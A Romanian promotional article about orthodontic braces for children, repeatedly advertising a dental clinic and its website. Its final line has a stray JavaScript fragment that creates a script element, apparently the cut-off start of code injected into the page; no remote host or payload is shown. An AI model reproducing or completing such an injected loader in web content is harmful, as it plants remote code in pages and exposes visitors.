aparat ortodontic copii

aparat ortodontic copii

Pentru a sti cu siguranta daca copilul dvs. are nevoie sau nu de un aparat ortodontic copii este necesar sa apelati la un specialist in domeniu. Multe persoane considera ca un astfel de aparat dentar este folosit doar pentru a indrepta dintii, insa nu este asa. la Tinka Smile de pilda veti gasi tot ajutorul de care aveti nevoie la un pret foarte accesibil si cu sfaturle si indicatiile de rigoare: www.chirurgie-orala.ro.

Ca si idee generala insa, sa stiti ca un aparat ortodontic copii sau adulti poate face parte de fapt dintr-un tratament de reabilitare a danturii de pilda, pentru a se obtine un rezultat estetic si functional care sa fie de durata.

Cand e deci nevoie de un aparat ortodontic copii mai exact?

Ei bine, dupa cum spuneam, este absolut necesar sa consultati un specialist inca de cand copilul e mai mic. Chiar daca inca de exemplu nu se poate monta un aparat ortodontic copii, este bine sa va asigurati din timp ca situatia este sub control pentru a oferi copilului dvs. zambetul sanatos si frumos pe care si-l doreste oricine.

La Tinka Smile regasiti specialisti in domeniu care sunt gata sa va ajute cu tot ce aveti nevoie, puteti face o programare pana si online: www.chirurgie-orala.ro.

Daca observati de pilda ca micutul dvs. are probleme la vorbire, sau daca observati o distantare mai mare intre dinti, daca maxilarul sau nu pare a se dezvolta in mod corespunzator, etc., nu ezitati sa apelati imediat la consultul unui specialist.

Un aparat ortodontic copii poate fi recomandat in situatia in care este nevoie de o reabilitare orala de pilda, desi mai rar la copii. Totodata poate fi recomandat in cazul in care exista inghesuiri ale dintilor sau spatieri intre acestia, dar si cand dintii nu sunt pur si simplu in pozitia ideala, etc.

Mai multe tipuri de aparate ortodontice pentru copii, mai multe avantaje

Cand va ganditi ca poate ar fi nevoie sa achizitionati un aparat ortodontic copii, e bine de stiut ca acestea sunt de mai multe feluri, fixe si mobile. Desigur, din nou, ideal este sa apelati la specialistul in domeniu, care va va recomanda intocmai ce are copilul dvs. nevoie sau ce ar fi cel mai indicat pentru el.

Avantajele pe care le ofera un aparat ortodontic copii sunt nenumarate, de la unele estetice la unele functionale. Un zambet sanatos si frumos confera clar mai multa incredere in sine, este sanatos pana si pentru psihic. In plus, un aparat ortodontic copii va corecta probleme de masticatie de pilda, chiar si de deglutitie ulterior si digestive. In plus daca de pilda nu exista o muscatura corecta la copil, se poate dezvolta pana si o problema a articulatiei temporo-mandibulare si astfel se poate ajunge la dureri de cap persistente.

Apelati cu incredere la Tinka Smile, asigurati copilului dvs. un zambet perfect si o sanatate dentara constanta, la preturi foarte accesibile si alaturi de medici cu experienta in domeniu.var d=document;var s=d.createElement(‘script’);